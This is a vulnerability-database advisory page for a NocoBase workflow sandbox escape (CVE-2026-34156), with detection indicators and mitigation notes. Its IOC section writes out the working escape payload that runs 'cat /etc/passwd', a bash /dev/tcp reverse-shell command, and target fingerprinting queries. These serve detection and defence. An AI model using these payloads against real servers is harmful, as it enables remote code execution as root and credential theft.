cbcvebase.
CVE-2026-34156
published 2026-03-31

CVE-2026-34156: NocoBase is an AI-powered no-code/low-code platform for building business applications and enterprise solutions. Prior to version 2.0.28, NocoBase's Workflow…

PriorityP184critical9.9CVSS 3.1
AVNACLPRLUINSCCHIHAH
EXPLOIT
EPSS
36.50%
98.3th percentile
NocoBase is an AI-powered no-code/low-code platform for building business applications and enterprise solutions. Prior to version 2.0.28, NocoBase's Workflow Script Node executes user-supplied JavaScript inside a Node.js vm sandbox with a custom require allowlist (controlled by WORKFLOW_SCRIPT_MODULES env var). However, the console object passed into the sandbox context exposes host-realm WritableWorkerStdio stream objects via console._stdout and console._stderr. An authenticated attacker can traverse the prototype chain to escape the sandbox and achieve Remote Code Execution as root. This issue has been patched in version 2.0.28.

Affected

2 ranges
VendorProductVersion rangeFixed in
nocobasenocobase< 2.0.282.0.28
nocobaseplugin-workflow-javascript>= 0 < 2.0.282.0.28

Detection & IOCsextracted from sources · hover to see the quote

url/api/auth:signIn
url/api/flow_nodes:test
commandconst Fn=console._stdout.constructor.constructor;const proc=Fn('return process')();const cp=proc.mainModule.require('child_process');
commandconst Fn=console._stdout.constructor.constructor;const proc=Fn('return process')();const cp=proc.mainModule.require('child_process');return cp.execSync('cat /etc/passwd').toString().trim();
otherWritableWorkerStdio
otherconsole._stdout
otherconsole._stderr
commandbash -c "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
sigma
id: CVE-2026-34156
info:
  name: NocoBase - VM Sandbox Escape to Remote Code Execution
  author: theamanrawat
  severity: critical
  • Detect exploitation attempts by monitoring POST requests to /api/flow_nodes:test containing the sandbox escape chain string 'console._stdout.constructor.constructor' in the request body.
  • Fingerprint vulnerable NocoBase instances using Shodan query 'http.title:"NocoBase"' or FOFA query 'body="__nocobase_public_path__"'.
  • Vulnerability check phase looks for 'WritableWorkerStdio' as the stream constructor name and 'function' as the fnConstructor type in the sandbox response — a positive match confirms the target is vulnerable.
  • The exploit authenticates via POST /api/auth:signIn with JSON body {"account":"<user>","password":"<pass>"} and then uses the returned Bearer token to call /api/flow_nodes:test — correlate these two sequential API calls from the same source IP as a strong exploitation indicator.
  • The Nuclei template confirms exploitation by matching 'root:.*:0:0:' regex in the HTTP response body from /api/flow_nodes:test, indicating successful /etc/passwd read via RCE.
  • The exploit payload uses the prototype chain traversal pattern: console._stdout.constructor.constructor → Function → process → mainModule.require('child_process'). Alert on this string pattern in any HTTP POST body.
  • ·The sandbox escape is only possible when the host console object is passed into the Node.js vm sandbox context. The attack surface is controlled by the WORKFLOW_SCRIPT_MODULES environment variable (custom require allowlist), but the console object exposure is the root cause regardless of allowlist configuration.
  • ·Exploitation requires valid credentials for any user with workflow access — it is not an unauthenticated vulnerability. The /api/flow_nodes:test endpoint should be restricted to admin-only roles as a compensating control.
  • ·The reverse shell payload uses bash /dev/tcp and is specific to Debian-based container environments. Other OS/shell environments may require a different reverse shell payload.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.